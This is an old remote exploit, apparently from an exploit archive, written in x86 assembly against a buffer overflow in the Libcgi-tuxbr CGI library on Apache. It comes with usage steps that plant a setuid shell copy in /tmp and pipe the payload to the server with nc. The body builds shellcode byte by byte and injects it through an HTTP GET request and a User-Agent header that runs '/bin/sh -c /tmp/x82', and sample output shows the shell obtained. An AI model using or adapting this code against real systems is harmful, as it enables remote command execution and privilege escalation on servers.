# ### Remote Libcgi-tuxbr CGI Sxploit. # ### How to exploit? # # 1) make '/tmp/x82' script - # # ex) # sh-2.05b$ id # uid=501(x82) gid=501(x82) groups=501(x82),10(wheel) # sh-2.05b$ cat > /tmp/x82 # #!/bin/sh # cp /bin/sh /tmp/nobody-sh # chmod 4755 /tmp/nobody-sh # ^C # sh-2.05b$ chmod 755 /tmp/x82 # # 2) remote execute '/tmp/x82' script - # # ex) # sh-2.05b$ gcc -o 0x82-Remote.tuxbrLibcgi 0x82-Remote.tuxbrLibcgi.s # sh-2.05b$ (./0x82-Remote.tuxbrLibcgi;cat)|nc localhost 80 # HTTP/1.1 500 Internal Server Error # Date: Thu, 21 Nov 2002 03:01:46 GMT # Server: Apache/1.3.20 (Unix) # Connection: close # Content-Type: text/html; charset=iso-8859-1 # # # # 500 Internal Server Error # #

Internal Server Error

# ... #

Apache/1.3.20 Server at localhost.localdomain Port 80

# # # sh-2.05b$ # sh-2.05b$ /tmp/nobody-sh -p # nobody-sh-2.05b$ whoami # nobody # nobody-sh-2.05b$ # # __ # exploit by "you dong-hun"(Xpl017Elz), . # My World: http://x82.i21c.net # # .globl main # main: pushl %ebp movl %esp,%ebp subl $204,%esp # # char x0x[200]; # int test; //sizeof(4); # pushl $200 # 200 pushl $0 # 0 leal -200(%ebp),%eax # x0x pushl %eax call memset # memset() call # movl $0,-204(%ebp) # test=0; hehe2: cmpl $91,-204(%ebp) # cmp test jle hehe5 jmp hehe3 # hehe5: leal -200(%ebp),%eax # x0x movl -204(%ebp),%edx # [test] movb $88,(%edx,%eax) # =0x78 # hehe4: incl -204(%ebp) # test++ jmp hehe2 # for(); # hehe3: leal -200(%ebp),%eax # x0x movl -204(%ebp),%edx # [test] movb $36,(%edx,%eax) # =0x24; incl -204(%ebp) # [test++] leal -200(%ebp),%eax # x0x movl -204(%ebp),%edx # [test] movb $-4,(%edx,%eax) # =0xfc; incl -204(%ebp) # [test++] leal -200(%ebp),%eax # x0x movl -204(%ebp),%edx # [test] movb $-1,(%edx,%eax) # =0xff; incl -204(%ebp) # [test++] leal -200(%ebp),%eax # x0x movl -204(%ebp),%edx # [test] movb $-65,(%edx,%eax) # =0xbf; incl -204(%ebp) # [test++] leal -200(%ebp),%eax # x0x # pushl %eax # x0x pushl $fff0 # CGI path call printf # printf() call # movl $0,-204(%ebp) # test=0; hehe6: cmpl $119,-204(%ebp) # cmp jle hehe9 jmp hehe7 # hehe9: leal -200(%ebp),%eax # x0x movl -204(%ebp),%edx # [test] movb $78,(%edx,%eax) # =0x78; # hehe8: incl -204(%ebp) # [test++] jmp hehe6 # for() # hehe7: # wow, shellcode start. leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-21,(%edx,%eax) # =0xeb; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $48,(%edx,%eax) # =0x30; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $94,(%edx,%eax) # =0x5e; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-119,(%edx,%eax) # =0x89; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $118,(%edx,%eax) # =0x76; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $24,(%edx,%eax) # =0x18; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $49,(%edx,%eax) # =0x31; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-64,(%edx,%eax) # =0xc0; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-120,(%edx,%eax) # =0x88; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $70,(%edx,%eax) # =0x46; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $8,(%edx,%eax) # =0x08; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-120,(%edx,%eax) # =0x88; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $70,(%edx,%eax) # =0x46; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $11,(%edx,%eax) # =0x0b; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-120,(%edx,%eax) # =0x88; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $70,(%edx,%eax) # =0x46; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $23,(%edx,%eax) # =0x17; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-119,(%edx,%eax) # =0x89; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $70,(%edx,%eax) # =0x46; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $36,(%edx,%eax) # =0x24; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-80,(%edx,%eax) # =0xb0; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $11,(%edx,%eax) # =0x0b; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-115,(%edx,%eax) # =0x8d; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $94,(%edx,%eax) # =0x5e; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $9,(%edx,%eax) # =0x09; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-119,(%edx,%eax) # =0x89; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $94,(%edx,%eax) # =0x5e; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $28,(%edx,%eax) # =0x1c; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-115,(%edx,%eax) # =0x8d; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $94,(%edx,%eax) # =0x5e; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $12,(%edx,%eax) # =0x0c; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-119,(%edx,%eax) # =0x89; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $94,(%edx,%eax) # =0x5e; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $32,(%edx,%eax) # =0x20; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-119,(%edx,%eax) # =0x89; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-13,(%edx,%eax) # =0xf3; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-115,(%edx,%eax) # =0x8d; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $78,(%edx,%eax) # =0x4e; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $24,(%edx,%eax) # =0x18; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-115,(%edx,%eax) # =0x8d; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $86,(%edx,%eax) # =0x56; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $36,(%edx,%eax) # =0x24; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-51,(%edx,%eax) # =0xcd; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-128,(%edx,%eax) # =0x80; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $49,(%edx,%eax) # =0x31; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-64,(%edx,%eax) # =0xc0; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-80,(%edx,%eax) # =0xb0; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $1,(%edx,%eax) # =0x01; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-51,(%edx,%eax) # =0xcd; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-128,(%edx,%eax) # =0x80; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-24,(%edx,%eax) # =0xe8; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-53,(%edx,%eax) # =0xcb; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-1,(%edx,%eax) # =0xff; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-1,(%edx,%eax) # =0xff; incl -204(%ebp) leal -200(%ebp),%eax movl -204(%ebp),%edx movb $-1,(%edx,%eax) # =0xff; incl -204(%ebp) leal -200(%ebp),%eax # pushl %eax # x0x pushl $fff1 # User-Agent call printf # printf() call # hehe1: leave ret # # HTTP method, CGI path & arguments setting. fff0: .string "GET /cgi-bin/sample3.cgi?name=%s&address=test&telephone=test HTTP/1.0\n" # User-Agent: nop, shellcode, command. fff1: .string "User-Agent: %s//bin/sh -c /tmp/x82\n\n" # execute "/tmp/x82" # ### Happy Exploit :-) # # ___ _ _ _ ____ ____ _ _ # |_ _| \ | | ___| |_ / ___|___ _ __ / ___| ___ ___ _ _ _ __(_) |_ _ _ # | || \| |/ _ \ __| | / _ \| '_ \ \___ \ / _ \/ __| | | | '__| | __| | | | # | || |\ | __/ |_| |__| (_) | |_) | ___) | __/ (__| |_| | | | | |_| |_| | # |___|_| \_|\___|\__|\____\___/| .__/ |____/ \___|\___|\__,_|_| |_|\__|\__, | # |_| |___/ #